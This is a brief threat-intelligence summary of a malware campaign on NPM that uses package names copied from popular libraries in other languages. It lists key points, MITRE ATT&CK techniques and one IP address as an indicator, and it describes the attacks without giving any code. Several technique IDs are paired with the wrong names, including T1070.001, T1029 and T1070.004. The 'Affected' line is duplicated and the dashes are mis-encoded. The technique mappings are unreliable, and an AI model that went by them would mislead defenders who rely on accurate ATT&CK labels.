Developers are increasingly falling prey to malicious NPM packages that mimic popular libraries, exploiting cross-ecosystem typosquatting tactics. These packages contain obfuscated code designed to execute malicious actions, exfiltrate data, and persist on infected systems.
Affected: NPM ecosystem, developers, Python, Java, C++, .NET, Node.js
Affected: NPM ecosystem, developers, Python, Java, C++, .NET, Node.js
Keypoints :
- Coordinated malware operation discovered in the NPM ecosystem.
- Malicious packages mimic popular libraries from other programming languages.
- Obfuscated code is used to evade security measures.
- Exfiltration of sensitive data and maintaining persistence on systems.
- Common IP address traced to a cloud provider in Beijing.
- Cross-ecosystem typosquatting is the main strategy used.
- Developer awareness and trust in package names is being exploited.
MITRE Techniques :
- T1071.001: Application Layer Protocol β Fetching malicious code via HTTPS.
- T1059.001: PowerShell β Executing commands through script downloads.
- T1105: Ingress Tool Transfer β Transferring tools from remote locations.
- T1005: Data from Local System β Collecting system data and credentials.
- T1083: File and Directory Discovery β Scanning system directories for sensitive files.
- T1033: System Owner/User Discovery β Targeting specific user/system environments.
- T1070.001: File Deletion β Removing traces of the attack.
- T1027: Obfuscation β Hiding malicious code to avoid detection.
- T1029: Scheduled Task/Job β Maintaining persistence with scheduled tasks.
- T1070.004: Permissions Modification β Modifying file permissions to maintain control.
- T1041: Exfiltration Over C2 β Exfiltrating data over command and control channels.
- T1030: Data Transfer Size Limits β Evading detection by exfiltrating small chunks.
- T1055: Process Injection β Injecting malicious code into legitimate processes.
- T1082: System Information Discovery β Gathering system info and credentials.
Indicator of Compromise :
- [IP Address] 8.152.163.60
Full Story: https://socket.dev/blog/npm-targeted-by-malware-campaign-mimicking-familiar-library-names